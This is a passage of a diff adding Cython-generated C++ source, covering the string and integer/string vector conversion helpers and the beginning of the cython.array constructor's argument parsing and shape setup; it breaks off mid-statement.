+#define __pyx_tuple__46 __pyx_mstate_global->__pyx_tuple__46 +#define __pyx_tuple__48 __pyx_mstate_global->__pyx_tuple__48 +#define __pyx_tuple__49 __pyx_mstate_global->__pyx_tuple__49 +#define __pyx_tuple__50 __pyx_mstate_global->__pyx_tuple__50 +#define __pyx_tuple__51 __pyx_mstate_global->__pyx_tuple__51 +#define __pyx_tuple__52 __pyx_mstate_global->__pyx_tuple__52 +#define __pyx_tuple__53 __pyx_mstate_global->__pyx_tuple__53 +#define __pyx_tuple__54 __pyx_mstate_global->__pyx_tuple__54 +#define __pyx_tuple__55 __pyx_mstate_global->__pyx_tuple__55 +#define __pyx_tuple__56 __pyx_mstate_global->__pyx_tuple__56 +#define __pyx_tuple__57 __pyx_mstate_global->__pyx_tuple__57 +#define __pyx_codeobj__20 __pyx_mstate_global->__pyx_codeobj__20 +#define __pyx_codeobj__21 __pyx_mstate_global->__pyx_codeobj__21 +#define __pyx_codeobj__22 __pyx_mstate_global->__pyx_codeobj__22 +#define __pyx_codeobj__23 __pyx_mstate_global->__pyx_codeobj__23 +#define __pyx_codeobj__24 __pyx_mstate_global->__pyx_codeobj__24 +#define __pyx_codeobj__25 __pyx_mstate_global->__pyx_codeobj__25 +#define __pyx_codeobj__26 __pyx_mstate_global->__pyx_codeobj__26 +#define __pyx_codeobj__27 __pyx_mstate_global->__pyx_codeobj__27 +#define __pyx_codeobj__29 __pyx_mstate_global->__pyx_codeobj__29 +#define __pyx_codeobj__30 __pyx_mstate_global->__pyx_codeobj__30 +#define __pyx_codeobj__31 __pyx_mstate_global->__pyx_codeobj__31 +#define __pyx_codeobj__32 __pyx_mstate_global->__pyx_codeobj__32 +#define __pyx_codeobj__34 __pyx_mstate_global->__pyx_codeobj__34 +#define __pyx_codeobj__35 __pyx_mstate_global->__pyx_codeobj__35 +#define __pyx_codeobj__36 __pyx_mstate_global->__pyx_codeobj__36 +#define __pyx_codeobj__47 __pyx_mstate_global->__pyx_codeobj__47 +/* #### Code section: module_code ### */ + +/* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + +static std::string __pyx_convert_string_from_py_std__in_string(PyObject *__pyx_v_o) { + Py_ssize_t __pyx_v_length; + char const *__pyx_v_data; + std::string __pyx_r; + __Pyx_RefNannyDeclarations + char const *__pyx_t_1; + std::string __pyx_t_2; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_string_from_py_std__in_string", 0); + + /* "string.from_py":14 + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 # <<<<<<<<<<<<<< + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) + */ + __pyx_v_length = 0; + + /* "string.from_py":15 + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) # <<<<<<<<<<<<<< + * return string(data, length) + * + */ + __pyx_t_1 = __Pyx_PyObject_AsStringAndSize(__pyx_v_o, (&__pyx_v_length)); if (unlikely(__pyx_t_1 == ((char const *)NULL))) __PYX_ERR(1, 15, __pyx_L1_error) + __pyx_v_data = __pyx_t_1; + + /* "string.from_py":16 + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + * return string(data, length) # <<<<<<<<<<<<<< + * + * + */ + try { + __pyx_t_2 = std::string(__pyx_v_data, __pyx_v_length); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 16, __pyx_L1_error) + } + __pyx_r = __pyx_t_2; + goto __pyx_L0; + + /* "string.from_py":13 + * + * @cname("__pyx_convert_string_from_py_std__in_string") + * cdef string __pyx_convert_string_from_py_std__in_string(object o) except *: # <<<<<<<<<<<<<< + * cdef Py_ssize_t length = 0 + * cdef const char* data = __Pyx_PyObject_AsStringAndSize(o, &length) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("string.from_py.__pyx_convert_string_from_py_std__in_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "vector.from_py":45 + * + * @cname("__pyx_convert_vector_from_py_int") + * cdef vector[X] __pyx_convert_vector_from_py_int(object o) except *: # <<<<<<<<<<<<<< + * cdef vector[X] v + * for item in o: + */ + +static std::vector __pyx_convert_vector_from_py_int(PyObject *__pyx_v_o) { + std::vector __pyx_v_v; + PyObject *__pyx_v_item = NULL; + std::vector __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_vector_from_py_int", 0); + + /* "vector.from_py":47 + * cdef vector[X] __pyx_convert_vector_from_py_int(object o) except *: + * cdef vector[X] v + * for item in o: # <<<<<<<<<<<<<< + * v.push_back(item) + * return v + */ + if (likely(PyList_CheckExact(__pyx_v_o)) || PyTuple_CheckExact(__pyx_v_o)) { + __pyx_t_1 = __pyx_v_o; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_o); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 47, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 47, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 47, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 47, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_4); + __pyx_t_4 = 0; + + /* "vector.from_py":48 + * cdef vector[X] v + * for item in o: + * v.push_back(item) # <<<<<<<<<<<<<< + * return v + * + */ + __pyx_t_5 = __Pyx_PyInt_As_int(__pyx_v_item); if (unlikely((__pyx_t_5 == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 48, __pyx_L1_error) + try { + __pyx_v_v.push_back(((int)__pyx_t_5)); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 48, __pyx_L1_error) + } + + /* "vector.from_py":47 + * cdef vector[X] __pyx_convert_vector_from_py_int(object o) except *: + * cdef vector[X] v + * for item in o: # <<<<<<<<<<<<<< + * v.push_back(item) + * return v + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "vector.from_py":49 + * for item in o: + * v.push_back(item) + * return v # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_v; + goto __pyx_L0; + + /* "vector.from_py":45 + * + * @cname("__pyx_convert_vector_from_py_int") + * cdef vector[X] __pyx_convert_vector_from_py_int(object o) except *: # <<<<<<<<<<<<<< + * cdef vector[X] v + * for item in o: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("vector.from_py.__pyx_convert_vector_from_py_int", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_item); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static std::vector __pyx_convert_vector_from_py_std_3a__3a_string(PyObject *__pyx_v_o) { + std::vector __pyx_v_v; + PyObject *__pyx_v_item = NULL; + std::vector __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + Py_ssize_t __pyx_t_2; + PyObject *(*__pyx_t_3)(PyObject *); + PyObject *__pyx_t_4 = NULL; + std::string __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__pyx_convert_vector_from_py_std_3a__3a_string", 0); + + /* "vector.from_py":47 + * cdef vector[X] __pyx_convert_vector_from_py_std_3a__3a_string(object o) except *: + * cdef vector[X] v + * for item in o: # <<<<<<<<<<<<<< + * v.push_back(item) + * return v + */ + if (likely(PyList_CheckExact(__pyx_v_o)) || PyTuple_CheckExact(__pyx_v_o)) { + __pyx_t_1 = __pyx_v_o; __Pyx_INCREF(__pyx_t_1); __pyx_t_2 = 0; + __pyx_t_3 = NULL; + } else { + __pyx_t_2 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_v_o); if (unlikely(!__pyx_t_1)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 47, __pyx_L1_error) + } + for (;;) { + if (likely(!__pyx_t_3)) { + if (likely(PyList_CheckExact(__pyx_t_1))) { + if (__pyx_t_2 >= PyList_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 47, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } else { + if (__pyx_t_2 >= PyTuple_GET_SIZE(__pyx_t_1)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_2); __Pyx_INCREF(__pyx_t_4); __pyx_t_2++; if (unlikely((0 < 0))) __PYX_ERR(1, 47, __pyx_L1_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_1, __pyx_t_2); __pyx_t_2++; if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 47, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + } + } else { + __pyx_t_4 = __pyx_t_3(__pyx_t_1); + if (unlikely(!__pyx_t_4)) { + PyObject* exc_type = PyErr_Occurred(); + if (exc_type) { + if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); + else __PYX_ERR(1, 47, __pyx_L1_error) + } + break; + } + __Pyx_GOTREF(__pyx_t_4); + } + __Pyx_XDECREF_SET(__pyx_v_item, __pyx_t_4); + __pyx_t_4 = 0; + + /* "vector.from_py":48 + * cdef vector[X] v + * for item in o: + * v.push_back(item) # <<<<<<<<<<<<<< + * return v + * + */ + __pyx_t_5 = __pyx_convert_string_from_py_std__in_string(__pyx_v_item); if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 48, __pyx_L1_error) + try { + __pyx_v_v.push_back(((std::string)__pyx_t_5)); + } catch(...) { + __Pyx_CppExn2PyErr(); + __PYX_ERR(1, 48, __pyx_L1_error) + } + + /* "vector.from_py":47 + * cdef vector[X] __pyx_convert_vector_from_py_std_3a__3a_string(object o) except *: + * cdef vector[X] v + * for item in o: # <<<<<<<<<<<<<< + * v.push_back(item) + * return v + */ + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "vector.from_py":49 + * for item in o: + * v.push_back(item) + * return v # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = __pyx_v_v; + goto __pyx_L0; + + /* "vector.from_py":45 + * + * @cname("__pyx_convert_vector_from_py_std_3a__3a_string") + * cdef vector[X] __pyx_convert_vector_from_py_std_3a__3a_string(object o) except *: # <<<<<<<<<<<<<< + * cdef vector[X] v + * for item in o: + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("vector.from_py.__pyx_convert_vector_from_py_std_3a__3a_string", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_pretend_to_initialize(&__pyx_r); + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_item); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + +/* Python wrapper */ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds); /*proto*/ +static int __pyx_array___cinit__(PyObject *__pyx_v_self, PyObject *__pyx_args, PyObject *__pyx_kwds) { + PyObject *__pyx_v_shape = 0; + Py_ssize_t __pyx_v_itemsize; + PyObject *__pyx_v_format = 0; + PyObject *__pyx_v_mode = 0; + int __pyx_v_allocate_buffer; + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__cinit__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_shape,&__pyx_n_s_itemsize,&__pyx_n_s_format,&__pyx_n_s_mode,&__pyx_n_s_allocate_buffer,0}; + PyObject* values[5] = {0,0,0,0,0}; + values[3] = ((PyObject *)__pyx_n_s_c); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_VARARGS(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_shape)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_itemsize)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 1); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_format)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, 2); __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 3: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_mode); + if (value) { values[3] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 4: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_VARARGS(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_allocate_buffer); + if (value) { values[4] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__cinit__") < 0)) __PYX_ERR(1, 131, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 5: values[4] = __Pyx_Arg_VARARGS(__pyx_args, 4); + CYTHON_FALLTHROUGH; + case 4: values[3] = __Pyx_Arg_VARARGS(__pyx_args, 3); + CYTHON_FALLTHROUGH; + case 3: values[2] = __Pyx_Arg_VARARGS(__pyx_args, 2); + values[1] = __Pyx_Arg_VARARGS(__pyx_args, 1); + values[0] = __Pyx_Arg_VARARGS(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_shape = ((PyObject*)values[0]); + __pyx_v_itemsize = __Pyx_PyIndex_AsSsize_t(values[1]); if (unlikely((__pyx_v_itemsize == (Py_ssize_t)-1) && PyErr_Occurred())) __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_v_format = values[2]; + __pyx_v_mode = values[3]; + if (values[4]) { + __pyx_v_allocate_buffer = __Pyx_PyObject_IsTrue(values[4]); if (unlikely((__pyx_v_allocate_buffer == (int)-1) && PyErr_Occurred())) __PYX_ERR(1, 132, __pyx_L3_error) + } else { + + /* "View.MemoryView":132 + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, + * mode="c", bint allocate_buffer=True): # <<<<<<<<<<<<<< + * + * cdef int idx + */ + __pyx_v_allocate_buffer = ((int)1); + } + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__cinit__", 0, 3, 5, __pyx_nargs); __PYX_ERR(1, 131, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("View.MemoryView.array.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return -1; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_shape), (&PyTuple_Type), 1, "shape", 1))) __PYX_ERR(1, 131, __pyx_L1_error) + if (unlikely(((PyObject *)__pyx_v_format) == Py_None)) { + PyErr_Format(PyExc_TypeError, "Argument '%.200s' must not be None", "format"); __PYX_ERR(1, 131, __pyx_L1_error) + } + __pyx_r = __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(((struct __pyx_array_obj *)__pyx_v_self), __pyx_v_shape, __pyx_v_itemsize, __pyx_v_format, __pyx_v_mode, __pyx_v_allocate_buffer); + + /* "View.MemoryView":131 + * cdef bint dtype_is_object + * + * def __cinit__(array self, tuple shape, Py_ssize_t itemsize, format not None, # <<<<<<<<<<<<<< + * mode="c", bint allocate_buffer=True): + * + */ + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer) { + int __pyx_v_idx; + Py_ssize_t __pyx_v_dim; + char __pyx_v_order; + int __pyx_r; + __Pyx_RefNannyDeclarations + Py_ssize_t __pyx_t_1; + int __pyx_t_2; + int __pyx_t_3; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + int __pyx_t_7; + char *__pyx_t_8; + Py_ssize_t __pyx_t_9; + Py_UCS4 __pyx_t_10; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__cinit__", 0); + __Pyx_INCREF(__pyx_v_format); + + /* "View.MemoryView":137 + * cdef Py_ssize_t dim + * + * self.ndim = len(shape) # <<<<<<<<<<<<<< + * self.itemsize = itemsize + * + */ + if (unlikely(__pyx_v_shape == Py_None)) { + PyErr_SetString(PyExc_TypeError, "object of type 'NoneType' has no len()"); + __PYX_ERR(1, 137, __pyx_L1_error) + } + __pyx_t_1 = PyTuple_GET_SIZE(__pyx_v_shape); if (unlikely(__pyx_t_1 == ((Py_ssize_t)-1))) __PYX_ERR(1, 137, __pyx_L1_error) + __pyx_v_self->ndim = ((int)__pyx_t_1); + + /* "View.MemoryView":138 + * + * self.ndim = len(shape) + * self.itemsize = itemsize # <<<<<<<<<<<<<< + * + * if not self.ndim: + */ + __pyx_v_self->itemsize = __pyx_v_itemsize; + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + __pyx_t_2 = (!(__pyx_v_self->ndim != 0)); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":141 + * + * if not self.ndim: + * raise ValueError, "Empty shape tuple for cython.array" # <<<<<<<<<<<<<< + * + * if itemsize <= 0: + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_Empty_shape_tuple_for_cython_arr, 0, 0); + __PYX_ERR(1, 141, __pyx_L1_error) + + /* "View.MemoryView":140 + * self.itemsize = itemsize + * + * if not self.ndim: # <<<<<<<<<<<<<< + * raise ValueError, "Empty shape tuple for cython.array" + * + */ + } + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + __pyx_t_2 = (__pyx_v_itemsize <= 0); + if (unlikely(__pyx_t_2)) { + + /* "View.MemoryView":144 + * + * if itemsize <= 0: + * raise ValueError, "itemsize <= 0 for cython.array" # <<<<<<<<<<<<<< + * + * if not isinstance(format, bytes): + */ + __Pyx_Raise(__pyx_builtin_ValueError, __pyx_kp_s_itemsize_0_for_cython_array, 0, 0); + __PYX_ERR(1, 144, __pyx_L1_error) + + /* "View.MemoryView":143 + * raise ValueError, "Empty shape tuple for cython.array" + * + * if itemsize <= 0: # <<<<<<<<<<<<<< + * raise ValueError, "itemsize <= 0 for cython.array" + * + */ + } + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + __pyx_t_2 = PyBytes_Check(__pyx_v_format); + __pyx_t_3 = (!__pyx_t_2); + if (__pyx_t_3) { + + /* "View.MemoryView":147 + * + * if not isinstance(format, bytes): + * format = format.encode('ASCII') # <<<<<<<<<<<<<< + * self._format = format # keep a reference to the byte string + * self.format = self._format + */ + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_v_format, __pyx_n_s_encode); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_6 = NULL; + __pyx_t_7 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_7 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_n_s_ASCII}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_7, 1+__pyx_t_7); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 147, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + __Pyx_DECREF_SET(__pyx_v_format, __pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":146 + * raise ValueError, "itemsize <= 0 for cython.array" + * + * if not isinstance(format, bytes): # <<<<<<<<<<<<<< + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + */ + } + + /* "View.MemoryView":148 + * if not isinstance(format, bytes): + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string # <<<<<<<<<<<<<< + * self.format = self._format + * + */ + if (!(likely(PyBytes_CheckExact(__pyx_v_format))||((__pyx_v_format) == Py_None) || __Pyx_RaiseUnexpectedTypeError("bytes", __pyx_v_format))) __PYX_ERR(1, 148, __pyx_L1_error) + __pyx_t_4 = __pyx_v_format; + __Pyx_INCREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __Pyx_GOTREF(__pyx_v_self->_format); + __Pyx_DECREF(__pyx_v_self->_format); + __pyx_v_self->_format = ((PyObject*)__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":149 + * format = format.encode('ASCII') + * self._format = format # keep a reference to the byte string + * self.format = self._format # <<<<<<<<<<<<<< + * + * + */ + if (unlikely(__pyx_v_self->_format == Py_None)) { + PyErr_SetString(PyExc_TypeError, "expected bytes, NoneType found"); + __PYX_ERR(1, 149, __pyx_L1_error) + } + __pyx_t_8 = __Pyx_PyBytes_AsWritableString(__pyx_v_self->_format); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(1, 149, __pyx_L1_error) + __pyx_v_self->format = __pyx_t_8; + + /* "View.MemoryView":152 + * + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) # <<<<<<<<<<<<<< + * self._strides = self._shape + self.ndim + * + */ + __pyx_v_self->_shape = ((Py_ssize_t *)PyObject_Malloc((((sizeof(Py_ssize_t)) * __pyx_v_self->ndim) * 2))); + + /* "View.MemoryView":153 + * + * self._shape = PyObject_Malloc(sizeof(Py_ssize_t)*self.ndim*2) + * self._strides = self._shape + self.ndim # <<<<<<<<<<<<<< + * + * if not self._shape: + */ + __pyx_v_self->_strides = (__pyx_v_self->_shape + __pyx_v_self->ndim); + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + __pyx_t_3 = (!(__pyx_v_self->_shape != 0)); + if (unlikely(__pyx_t_3)) { + + /* "View.MemoryView":156 + * + * if not self._shape: + * raise MemoryError, "unable to allocate shape and strides." # <<<<<<<<<<<<<< + * + * + */ + __Pyx_Raise(__pyx_builtin_MemoryError, __pyx_kp_s_unable_to_allocate_shape_and_str, 0, 0); + __PYX_ERR(1, 156, __pyx_L1_error) + + /* "View.MemoryView":155 + * self._strides = self._shape + self.ndim + * + * if not self._shape: # <<<<<<<<<<<<<< + * raise MemoryError, "unable to allocate shape and strides." + * + */ + } + + /* "View.MemoryView":159 + * + * + * for idx, dim in enumerate(shape): # <<<<<<<<<<<<<< + * if dim <= 0: + * raise ValueError, f"Invalid shape in axis {idx}: {dim}." + */ + __pyx_t_7 = 0; + __pyx_t_4 = __pyx_v_shape; __Pyx_INCREF(__pyx_t_4); __pyx_t_1 = 0; + for (;;) { + if (__pyx_t_1 >= PyTuple_GET_SIZE(__pyx_t_4)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_5 = 